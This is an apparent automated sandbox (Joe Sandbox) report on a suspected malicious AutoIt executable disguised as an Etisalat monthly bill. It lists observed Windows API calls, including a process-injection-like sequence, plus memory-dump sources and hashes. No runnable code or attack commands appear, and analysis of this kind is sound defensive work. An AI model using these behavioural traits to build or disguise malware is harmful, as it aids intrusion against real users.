                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                      • String ID:
                                      • API String ID: 1559183368-0
                                      • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                      • Instruction ID: 96307a8f8aebab69c555334f74bf653166ab0c1161ce04bbac3d8261fe1fc667
                                      • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                      • Instruction Fuzzy Hash: A6517274A00B06DBDB34AEA9C8846AE77E5EF40320F64C7A9E825962F0E7719D50DB50
                                      APIs
                                        • Part of subcall function 00B64F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00C262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B64F6F
                                      • _free.LIBCMT ref: 00B9E68C
                                      • _free.LIBCMT ref: 00B9E6D3
                                        • Part of subcall function 00B66BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00B66D0D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                      • API String ID: 2861923089-1757145024
                                      • Opcode ID: 366be1f172f22e7c96495aec7cb60c4a1c9effd9b62be302b7e7bb7c246db925
                                      • Instruction ID: 0e0c65b408a09a0d2617830502c4af04b4c82fa28d1deacc48d13ca93171b773
                                      • Opcode Fuzzy Hash: 366be1f172f22e7c96495aec7cb60c4a1c9effd9b62be302b7e7bb7c246db925
                                      • Instruction Fuzzy Hash: BA914A71910219AFCF14EFA4CC919EDB7F4FF19314F1444AAE825AB2A1EB34E905CB60
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00B635A1,SwapMouseButtons,00000004,?), ref: 00B635D4
                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00B635A1,SwapMouseButtons,00000004,?,?,?,?,00B62754), ref: 00B635F5
                                      • RegCloseKey.KERNELBASE(00000000,?,?,00B635A1,SwapMouseButtons,00000004,?,?,?,?,00B62754), ref: 00B63617
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: Control Panel\Mouse
                                      • API String ID: 3677997916-824357125
                                      • Opcode ID: 4f9f4b3ff62d7d236cee0af5afd8eaf0e2c226c93d86e3e80e25a90067d9cdea
                                      • Instruction ID: 81db5a53e1b61ac3b0c18451402f9ab524daa87d4c85cfd9494c853e8254f293
                                      • Opcode Fuzzy Hash: 4f9f4b3ff62d7d236cee0af5afd8eaf0e2c226c93d86e3e80e25a90067d9cdea
                                      • Instruction Fuzzy Hash: E4114571614218BFDB208F68DC80ABEBBF8EF04B40F0084A9E805DB210E6719F409BA0
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 015E1ABB
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015E1B51
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015E1B73
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977906262.00000000015E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_15e0000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                      • Instruction ID: ffdec5c9f1e6c7719a0fcb7575ce6cfe859f9ac27eb22f0ffd225393a0531ce8
                                      • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                      • Instruction Fuzzy Hash: 96621A30E14658DAEB24CFA4C844BDEB7B6FF58300F1091A9D20DEB294E7759E81CB59
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                      • String ID:
                                      • API String ID: 2782032738-0
                                      • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                      • Instruction ID: 32e4f88e2a6beb9dd27ed6d106dff7cb27f16197878d9e5187bf4cbea316695a
                                      • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                      • Instruction Fuzzy Hash: BC41A4716406079FDF2CEEA9C8809AF77EAEF80360B2485BDE8559B660D771DD40CB44
                                      APIs
                                      • _memset.LIBCMT ref: 00B9EE62
                                      • GetOpenFileNameW.COMDLG32(?), ref: 00B9EEAC
                                        • Part of subcall function 00B648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B648A1,?,?,00B637C0,?), ref: 00B648CE
                                        • Part of subcall function 00B809D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B809F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Name$Path$FileFullLongOpen_memset
                                      • String ID: X
                                      • API String ID: 3777226403-3081909835
                                      • Opcode ID: f6d6e587a293704bbfcc23f6853cde8237b4d4965b8ee37d34a2a61d803cb140
                                      • Instruction ID: af4d44a33e44b8d754275b3e6193fcfe00e047977dbe5efcd60dec7c60919e4c
                                      • Opcode Fuzzy Hash: f6d6e587a293704bbfcc23f6853cde8237b4d4965b8ee37d34a2a61d803cb140
                                      • Instruction Fuzzy Hash: 4C21D8709102589BCF51DF94C845BEE7BF99F49714F00409AE408E7341DFB8598ACFA1
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __fread_nolock_memmove
                                      • String ID: EA06
                                      • API String ID: 1988441806-3962188686
                                      • Opcode ID: 08794ed9022467d35aca123a77f8b6133b1105c2d16d3e1ccfc3da7710f99799
                                      • Instruction ID: 6b4f3e8c46385f7e51af1c6fbb17acac80741128c75cf6d41347873ca5794ef1
                                      • Opcode Fuzzy Hash: 08794ed9022467d35aca123a77f8b6133b1105c2d16d3e1ccfc3da7710f99799
                                      • Instruction Fuzzy Hash: 3F01B971904258AEDB28D7A8CC5AFFE7BFCDB15301F00459FF552D2181E575A604D760
                                      APIs
                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00BC9B82
                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00BC9B99
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Temp$FileNamePath
                                      • String ID: aut
                                      • API String ID: 3285503233-3010740371
                                      • Opcode ID: f63ed858088d7246e4beac40f1149c0bc39b5e035c17f3b82c51c777d40f9735
                                      • Instruction ID: dd7131ec48068769b0772f5d6a94edf6264bb1ee85696d87de07ee68daaad424
                                      • Opcode Fuzzy Hash: f63ed858088d7246e4beac40f1149c0bc39b5e035c17f3b82c51c777d40f9735
                                      • Instruction Fuzzy Hash: E8D05E7994030EABDB109B94DC4EFEA772CE704700F0042B1BF549A0A2DEB055988B92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6a449ff16e2a50c21dfefecdd6f1329892eb20fef62e8e40970ca324c891ebab
                                      • Instruction ID: 4dee52d924ef3270b3d2162eb173010b3b130134df21ce6f94e12488d115e2ae
                                      • Opcode Fuzzy Hash: 6a449ff16e2a50c21dfefecdd6f1329892eb20fef62e8e40970ca324c891ebab
                                      • Instruction Fuzzy Hash: 61F103706083019FCB14DF28C494A6AFBE5FB88314F1489AEF8999B351E775E945CF82
                                      APIs
                                        • Part of subcall function 00B803A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B803D3
                                        • Part of subcall function 00B803A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00B803DB
                                        • Part of subcall function 00B803A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B803E6
                                        • Part of subcall function 00B803A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B803F1
                                        • Part of subcall function 00B803A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00B803F9
                                        • Part of subcall function 00B803A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00B80401
                                        • Part of subcall function 00B76259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00B6FA90), ref: 00B762B4
                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B6FB2D
                                      • OleInitialize.OLE32(00000000), ref: 00B6FBAA
                                      • CloseHandle.KERNEL32(00000000), ref: 00BA49F2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                      • String ID:
                                      • API String ID: 1986988660-0
                                      • Opcode ID: b48779204e8c92a6fe896d5300a3a25d34cecd39e20c2c4299c0444a48633380
                                      • Instruction ID: 3a7f8ede74e15919ceb8c04286141409ad93173f8b96590836be577ea17dd2bf
                                      • Opcode Fuzzy Hash: b48779204e8c92a6fe896d5300a3a25d34cecd39e20c2c4299c0444a48633380
                                      • Instruction Fuzzy Hash: 3881A9B0921290CEC7A4EF39F9547297BE4FB5870871085BAD099C7A72EB35550ACF70
                                      APIs
                                      • _memset.LIBCMT ref: 00B64401
                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B644A6
                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B644C3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_$_memset
                                      • String ID:
                                      • API String ID: 1505330794-0
                                      • Opcode ID: 94c69f80319389a9a2c3ae510ad87379f6ca83782b9afa2334be0127bd96ac92
                                      • Instruction ID: ff7bb3f492987c942047c752c32f19974906b436c7826ed5e4fda937bbf630a1
                                      • Opcode Fuzzy Hash: 94c69f80319389a9a2c3ae510ad87379f6ca83782b9afa2334be0127bd96ac92
                                      • Instruction Fuzzy Hash: D1318FB0504701CFD721DF24D885B9BBBF8FB49708F00096EE59A87391DB75A944CBA2
                                      APIs
                                      • __FF_MSGBANNER.LIBCMT ref: 00B85963
                                        • Part of subcall function 00B8A3AB: __NMSG_WRITE.LIBCMT ref: 00B8A3D2
                                        • Part of subcall function 00B8A3AB: __NMSG_WRITE.LIBCMT ref: 00B8A3DC
                                      • __NMSG_WRITE.LIBCMT ref: 00B8596A
                                        • Part of subcall function 00B8A408: GetModuleFileNameW.KERNEL32(00000000,00C243BA,00000104,?,00000001,00000000), ref: 00B8A49A
                                        • Part of subcall function 00B8A408: ___crtMessageBoxW.LIBCMT ref: 00B8A548
                                        • Part of subcall function 00B832DF: ___crtCorExitProcess.LIBCMT ref: 00B832E5
                                        • Part of subcall function 00B832DF: ExitProcess.KERNEL32 ref: 00B832EE
                                        • Part of subcall function 00B88D68: __getptd_noexit.LIBCMT ref: 00B88D68
                                      • RtlAllocateHeap.NTDLL(01630000,00000000,00000001,00000000,?,?,?,00B81013,?), ref: 00B8598F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                      • String ID:
                                      • API String ID: 1372826849-0
                                      • Opcode ID: 9f4df0e2c6631fc84e6f6a37f0fe5a66dd1c9f1bf7e67dc86000d48ce793679b
                                      • Instruction ID: 0b6cacb1a326c329ee5f66dddcdb8316c92e3329f3dead22d5187d9f81f1ce0f
                                      • Opcode Fuzzy Hash: 9f4df0e2c6631fc84e6f6a37f0fe5a66dd1c9f1bf7e67dc86000d48ce793679b
                                      • Instruction Fuzzy Hash: B101D231200A15DFE6357B25D842B6E72C8DF52B71F5000AAF400AA1F1DE709D01C3A1
                                      APIs
                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00BC97D2,?,?,?,?,?,00000004), ref: 00BC9B45
                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00BC97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00BC9B5B
                                      • CloseHandle.KERNEL32(00000000,?,00BC97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00BC9B62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleTime
                                      • String ID:
                                      • API String ID: 3397143404-0
                                      • Opcode ID: fb09cde9447f85ed7e770f8dbfd0b00350c56bc04288c37fa756092217bee97d
                                      • Instruction ID: f46abb932857799684bdc4a38d9a810ae3a1c6f12c70d527e4180ab714cf39f3
                                      • Opcode Fuzzy Hash: fb09cde9447f85ed7e770f8dbfd0b00350c56bc04288c37fa756092217bee97d
                                      • Instruction Fuzzy Hash: 1CE08632180219B7E7211B54EC49FDA7B68EB05761F108120FB147E0E08BB129119799
                                      APIs
                                      • _free.LIBCMT ref: 00BC8FA5
                                        • Part of subcall function 00B82F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00B89C64), ref: 00B82FA9
                                        • Part of subcall function 00B82F95: GetLastError.KERNEL32(00000000,?,00B89C64), ref: 00B82FBB
                                      • _free.LIBCMT ref: 00BC8FB6
                                      • _free.LIBCMT ref: 00BC8FC8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
                                      • Instruction ID: f42ff87a3b50ceb1d264dff711b9271fa2bc2e81122c52e0586fa0cf987fd71d
                                      • Opcode Fuzzy Hash: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
                                      • Instruction Fuzzy Hash: 1EE012B17097015ACA24B678AD51F9357EE9F48350B180C9DB549DB152DE24E841C264
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: CALL
                                      • API String ID: 0-4196123274
                                      • Opcode ID: 459a52d0124a01f80bcbd384bec2b25123b569e72abe2f9a26d082d03022fa8d
                                      • Instruction ID: a5b7a3dd9d9f9a6d118bbae9383808272f936eb651905992271eaec6522f2a09
                                      • Opcode Fuzzy Hash: 459a52d0124a01f80bcbd384bec2b25123b569e72abe2f9a26d082d03022fa8d
                                      • Instruction Fuzzy Hash: 2D221870518241DFCB24EF14C494B6ABBF1FF45304F1489ADE89A9B262D735ED85CB82
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: EA06
                                      • API String ID: 4104443479-3962188686
                                      • Opcode ID: 160b5ee482278f7439063201103ba9a6d6df867baeb6448cb31733123770a82b
                                      • Instruction ID: 7c6dcacc0136cd503d33240d1748b0c2b5fd92abbbe03864a9f963386c73f43d
                                      • Opcode Fuzzy Hash: 160b5ee482278f7439063201103ba9a6d6df867baeb6448cb31733123770a82b
                                      • Instruction Fuzzy Hash: 82416C32A049549BCF295B6488917BF7FE6EB05300F2844F4F8429A282C72E9D41C7A1
                                      APIs
                                      • IsThemeActive.UXTHEME ref: 00B64992
                                        • Part of subcall function 00B835AC: __lock.LIBCMT ref: 00B835B2
                                        • Part of subcall function 00B835AC: DecodePointer.KERNEL32(00000001,?,00B649A7,00BB81BC), ref: 00B835BE
                                        • Part of subcall function 00B835AC: EncodePointer.KERNEL32(?,?,00B649A7,00BB81BC), ref: 00B835C9
                                        • Part of subcall function 00B64A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B64A73
                                        • Part of subcall function 00B64A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B64A88
                                        • Part of subcall function 00B63B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B63B7A
                                        • Part of subcall function 00B63B4C: IsDebuggerPresent.KERNEL32 ref: 00B63B8C
                                        • Part of subcall function 00B63B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00C262F8,00C262E0,?,?), ref: 00B63BFD
                                        • Part of subcall function 00B63B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00B63C81
                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B649D2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                      • String ID:
                                      • API String ID: 1438897964-0
                                      • Opcode ID: 69e3f131e70ff53dc773a14dbfddf48291e3543e59c94cb1265a7719a27f8c64
                                      • Instruction ID: db773b408e172327c9e32ec4539d8c28613ba49f571884dd4f41798464252b21
                                      • Opcode Fuzzy Hash: 69e3f131e70ff53dc773a14dbfddf48291e3543e59c94cb1265a7719a27f8c64
                                      • Instruction Fuzzy Hash: 86118C719283519FC310EF68DC45A1EFBE8FB98B10F00466EF045872B1DB749A46CB92
                                      APIs
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00B65981,?,?,?,?), ref: 00B65E27
